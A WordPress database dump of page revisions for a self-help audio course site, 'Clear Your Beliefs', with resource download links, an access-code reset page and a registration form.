(1123, 4194, '2014-06-28 09:16:40', '2014-06-28 14:16:40', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\nLion Goodman\r\nFounder\r\n\r\n&nbsp;\r\n<h6>Audio Recordings:</h6>\r\n/cyb/wp-content/uploads/resources\r\n\r\n<a href="/cyb/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/cyb/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3">Clear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/cyb/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3">Clear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/cyb/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3">Clear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/cyb/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3">Clear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/cyb/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3">Clear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/cyb/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3">Clear Your Beliefs-07.mp3</a>\r\n<h6><strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a></h6>\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n<h6>Bonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a></h6>\r\n&nbsp;\r\n<h6>Bonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a></h6>\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 09:16:40', '2014-06-28 14:16:40', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1124, 4194, '2014-06-28 09:19:50', '2014-06-28 14:19:50', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\nLion Goodman\r\nFounder\r\n\r\n&nbsp;\r\n<h6>Audio Recordings:</h6>\r\n/cyb/wp-content/uploads/resources\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3">Clear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3">Clear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3">Clear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3">Clear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3">Clear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3">Clear Your Beliefs-07.mp3</a>\r\n<h6><strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a></h6>\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n<h6>Bonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a></h6>\r\n&nbsp;\r\n<h6>Bonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a></h6>\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 09:19:50', '2014-06-28 14:19:50', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1126, 4194, '2014-06-28 09:23:40', '2014-06-28 14:23:40', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\nLion Goodman\r\nFounder\r\n\r\n&nbsp;\r\n<h6>Audio Recordings:</h6>\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3">Clear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3">Clear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3">Clear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3">Clear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3">Clear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3">Clear Your Beliefs-07.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3"><strong>Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</strong></a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3</a>\r\n<h6><strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a></h6>\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n<h6>Bonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a></h6>\r\n&nbsp;\r\n<h6>Bonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a></h6>\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 09:23:40', '2014-06-28 14:23:40', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1127, 4194, '2014-06-28 09:25:41', '2014-06-28 14:25:41', '<h1 style="text-align: center;">Thank You for Registering for\r\n<em>Clear Your Beliefs\r\n</em></h1>\r\n&nbsp;\r\n\r\nThis page contains all of the resources you need to take yourself through this breakthrough program.\r\n\r\nIf you are working with a <em>Clear Your Beliefs Coach</em>, he or she will instruct you on which audio to listen to, and how to follow up with them.\r\n\r\nDownload the "Recommended Course Flow" for suggestions on taking yourself through the program.\r\n\r\nWelcome to Clear Your Beliefs!\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature.jpg"><img class="alignleft size-medium wp-image-256 no-shad" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-signature-300x70.jpg" alt="lion-signature" width="300" height="70" /></a>\r\n\r\nLion Goodman\r\nFounder\r\n\r\n&nbsp;\r\n<h6>Audio Recordings:</h6>\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-01.mp3">Clear Your Beliefs-01.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-02.mp3">Clear Your Beliefs-02.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-03.mp3">Clear Your Beliefs-03.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-04.mp3">Clear Your Beliefs-04.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-05.mp3">Clear Your Beliefs-05.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-06.mp3">Clear Your Beliefs-06.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear%20Your Beliefs-07.mp3">Clear Your Beliefs-07.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-Bonus Call With Anodea Judith.mp3">Clear Your Beliefs-Bonus Call With Anodea Judith.mp3</a>\r\n\r\n<a href="/wp-content/uploads/resources/Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3">Clear Your Beliefs-BonusCallWithCaristaLuminare.mp3</a>\r\n\r\n<strong>Transcripts:</strong>\r\nSession 1: Pull All the Old Junk Out of Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-1.pdf">CYB-1\r\n</a>\r\nSession 2:  Clear Your Negative Beliefs About Who You Are\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-2.pdf">CYB-2</a>\r\n\r\nSession 3: Clear Your Limiting Beliefs About Your Capabilities\r\nPDF Download  <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-3.pdf">CYB-3</a>\r\n\r\nSession 4: Clear Your Outdated Beliefs About Love &amp; Relationship\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-4.pdf">CYB-4</a>\r\n\r\nSession 5: Clear Your Old Beliefs About Money and Work\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-5.pdf">CYB-5</a>\r\n\r\nSession 6: Clear Uncomfortable Beliefs About Your Body &amp; Health\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-6.pdf">CYB-6</a>\r\n\r\nSession 7: Clear Out the Rest of the Junk in Your BeliefCloset\r\nPDF Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-7.pdf">CYB-7</a>\r\n\r\nBonus Call with Carista Luminare, Ph.D.:  What Makes Love So Confusing?            Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-1-CL.pdf">CYB Bonus 1 CL</a>\r\n\r\nBonus Call with Anodea Judith, Ph.D: The Spiritual Technology of Manifesting         Download: <a href="http://clearyourbeliefs.com/wp-content/uploads/2014/03/CYB-Bonus-2-AJ.pdf">CYB Bonus 2 AJ</a>\r\n\r\n&nbsp;\r\n<h6>Bonus Materials:</h6>\r\n<strong>Take the LoveStyle Profile Quiz by clicking <a href="http://www.confusedaboutlove.com/the-lovestyles-profile/">HERE</a>.  Or paste this url into your browser:</strong>  www.ConfusedAboutLove.com/the-lovestyles-profile/\r\n\r\n<strong>Download the multimedia eBook, "Transform Your Beliefs" by Lion Goodman, by clicking <a href="https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw">HERE</a>. </strong>  Or paste this url into your browser:  https://www.yousendit.com/download/TEhWM25NNnlVbStGa2NUQw\r\n\r\n[Note: You''ll be taken to a Hightail Download page.  Simply click on the "Download" button and your copy of the eBook will be downloaded into your computer.  It''s a big file, so be patient. You need Adobe Reader Version 9 or above to access all the materials. (Get the latest Adobe Reader <a href="http://get.adobe.com/reader/">HERE</a>.)\r\n\r\nOnce you''ve downloaded it, you''ll see embedded video and audio files that will play when you click on them. If they don''t play, click the link below each media, which will take you to the same file on the web (be sure you''re connected to the Internet).]\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Resources', '', 'inherit', 'closed', 'open', '', '139-revision-v1', '', '', '2014-06-28 09:25:41', '2014-06-28 14:25:41', '', 139, 'http://clearyourbeliefs.com/139-revision-v1', 0, 'revision', '', 0),
(1128, 4194, '2014-06-28 09:34:10', '2014-06-28 14:34:10', '<h1 style="text-align: center;">Reset Your Access Code &nbsp; &nbsp; &nbsp; &nbsp;</h1>', 'Incorrect Access Code', '', 'publish', 'closed', 'open', '', 'incorrect-access-code', '', '', '2014-07-04 15:34:37', '2014-07-04 20:34:37', '', 0, 'http://clearyourbeliefs.com/?page_id=1128', 0, 'page', '', 0),
(1226, 4194, '2014-07-04 15:32:49', '2014-07-04 20:32:49', '<h1 style="text-align: center;">Reset Your Access Code</h1>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-04 15:32:49', '2014-07-04 20:32:49', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1227, 4194, '2014-07-04 15:33:58', '2014-07-04 20:33:58', '<h1 style="text-align: center;">Reset Your Access Code &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</h1>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-04 15:33:58', '2014-07-04 20:33:58', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1216, 4194, '2014-07-03 16:05:07', '2014-07-03 21:05:07', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to re-set the access code.</h6>\r\n<h6 style="text-align: center;">If you have already purchased the Clear Your Beliefs Program and, after submitting the form, you are still experiencing difficulties gaining access, please contact <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a></h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-03 16:05:07', '2014-07-03 21:05:07', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1215, 4194, '2014-07-03 15:52:53', '2014-07-03 20:52:53', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, either find the email you received when you purchased the Clear Your Belief Audio Program and link to the page from there or click Submit on the form below to re-set the access code.</h6>\r\n<h6 style="text-align: center;">If you have already purchased the Clear Your Beliefs Program and, after submitting the form, you are still experiencing difficulties gaining access, please contact <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a></h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet, click <a href="http://clearyourbeliefs.com">here</a> to see what you''re missing!</h6>\r\n<h3 style="text-align: center;">Thank you!</h3>\r\n&nbsp;\r\n<div class="icon_box" style="width: 50%; margin: 0 auto; text-align: center;"><form class="infusion-form" accept-charset="UTF-8" action="checkEmail()" method="POST"><input name="inf_form_xid" type="hidden" value="8361917d9aa5397b8f70576be53ad2a9" />\r\n<input name="inf_form_name" type="hidden" value="Request information" />\r\n<input name="infusionsoft_version" type="hidden" value="1.31.0.32" />\r\n<h1>Reset Passcode</h1>\r\n&nbsp;\r\n<div class="infusion-field"><label for="inf_field_FirstName">First Name *</label>\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" /></div>\r\n&nbsp;\r\n<div class="infusion-field"><label for="inf_field_Email">Email *</label>\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" /></div>\r\n&nbsp;\r\n<div class="infusion-field"><label for="inf_field_Password">Please choose your own passcode. *</label>\r\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" /></div>\r\n&nbsp;\r\n<div class="infusion-field"><label for="inf_misc_Pleasereenteryourpasscode">Please re-enter your passcode. *</label>\r\n<input id="inf_misc_Pleasereenteryourpasscode" class="infusion-field-input-container" name="inf_misc_Pleasereenteryourpasscode" type="text" /></div>\r\n&nbsp;\r\n<div class="infusion-submit"><input style="margin: 0 auto;" type="submit" value="Reset Passcode" /></div>\r\n</form>&nbsp;\r\n\r\n&nbsp;\r\n\r\n</div>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-07-03 15:52:53', '2014-07-03 20:52:53', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1129, 4194, '2014-06-28 09:34:10', '2014-06-28 14:34:10', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, please link to this page from the email you received when you purchased the program.</h6>\r\n<h3>Thank you!</h3>\r\n&nbsp;', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-06-28 09:34:10', '2014-06-28 14:34:10', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1130, 4194, '2014-07-04 10:18:41', '2014-07-04 15:18:41', '<h1 style="text-align: center;">Reset Your Passcode</h1>', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-autosave-v1', '', '', '2014-07-04 10:18:41', '2014-07-04 15:18:41', '', 1128, 'http://clearyourbeliefs.com/1128-autosave-v1', 0, 'revision', '', 0),
(1131, 4194, '2014-06-28 09:43:43', '2014-06-28 14:43:43', '<h1 style="text-align: center;">Sorry, your access code is incorrect.</h1>\r\n<h6 style="text-align: center;">To access the resources you purchased, please link to this page from the email you received when you purchased the program.</h6>\r\n<h6 style="text-align: center;">If you haven''t purchased this program yet,click <a href="http://clearyourbeliefs.com">here</a> to see what your missing!</h6>\r\n<h3>Thank you!</h3>\r\n&nbsp;', 'Incorrect Access Code', '', 'inherit', 'closed', 'open', '', '1128-revision-v1', '', '', '2014-06-28 09:43:43', '2014-06-28 14:43:43', '', 1128, 'http://clearyourbeliefs.com/1128-revision-v1', 0, 'revision', '', 0),
(1132, 4194, '2014-06-28 13:54:03', '2014-06-28 18:54:03', '<h1 style="text-align: center;">Thank you for your order!</h1>\r\n<h6 style="text-align: center;">Check your email for your confirmation and Access Code.<br />You should receive it within a few minutes.<br />If you don’t, please check your spam folder.</h6>\r\n<div class="icon_box" style="width: 50%; margin: 30px auto;"><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/6430086e2fd4ab1d24af175de21dedd2" method="POST">\r\n<h6><input name="inf_form_xid" type="hidden" value="6430086e2fd4ab1d24af175de21dedd2" /><input name="inf_form_name" type="hidden" value="clearyourbeliefs.com/registration" /><input name="infusionsoft_version" type="hidden" value="1.31.0.28" /></h6>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_FirstName">First Name *</label>\r\n\r\n<input id="inf_field_FirstName" class="infusion-field-input-container" name="inf_field_FirstName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_LastName">Last Name *</label>\r\n\r\n<input id="inf_field_LastName" class="infusion-field-input-container" name="inf_field_LastName" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_City">City *</label>\r\n\r\n<input id="inf_field_City" class="infusion-field-input-container" name="inf_field_City" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Email">Email *</label>\r\n\r\n<input id="inf_field_Email" class="infusion-field-input-container" name="inf_field_Email" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_GoodDaysforCoaching0">Good Days for Coaching *</label>\r\n\r\n<select id="inf_custom_GoodDaysforCoaching0" multiple="multiple" name="inf_custom_GoodDaysforCoaching0" size="7"><option value="Monday">Monday</option><option value="Tuesday">Tuesday</option><option value="Wednesday">Wednesday</option><option value="Thursday">Thursday</option><option value="Friday">Friday</option><option value="Saturday">Saturday</option><option value="Sunday">Sunday</option></select>\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_GoodTimesforCoaching">Good Times for Coaching *</label>\r\n\r\n<select id="inf_custom_GoodTimesforCoaching" multiple="multiple" name="inf_custom_GoodTimesforCoaching" size="4"><option value="Morning (8 am to 11 am)">Morning (8 am to 11 am)</option><option value="Mid-day (11 am to 2 pm)">Mid-day (11 am to 2 pm)</option><option value="Afternoon (2 pm to 6 pm)">Afternoon (2 pm to 6 pm)</option><option value="Evening (6 pm to 10 pm)">Evening (6 pm to 10 pm)</option></select>\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_custom_TimeZone">Time Zone *</label>\r\n\r\n<input id="inf_custom_TimeZone" class="infusion-field-input-container" name="inf_custom_TimeZone" type="text" />\r\n\r\n</div>\r\n<div class="infusion-field">\r\n\r\n<label for="inf_field_Password">Please choose your own passcode. *</label>\r\n\r\n<input id="inf_field_Password" class="infusion-field-input-container" name="inf_field_Password" type="password" />\r\n\r\n</div>\r\n<div class="infusion-submit">\r\n\r\n<input type="submit" value="Register" />\r\n\r\n</div>\r\n</form></div>', 'Registration', '', 'publish', 'closed', 'open', '', 'registration-2', '', '', '2015-03-12 22:30:20', '2015-03-13 03:30:20', '', 0, 'http://clearyourbeliefs.com/?page_id=1132', 0, 'page', '', 0),
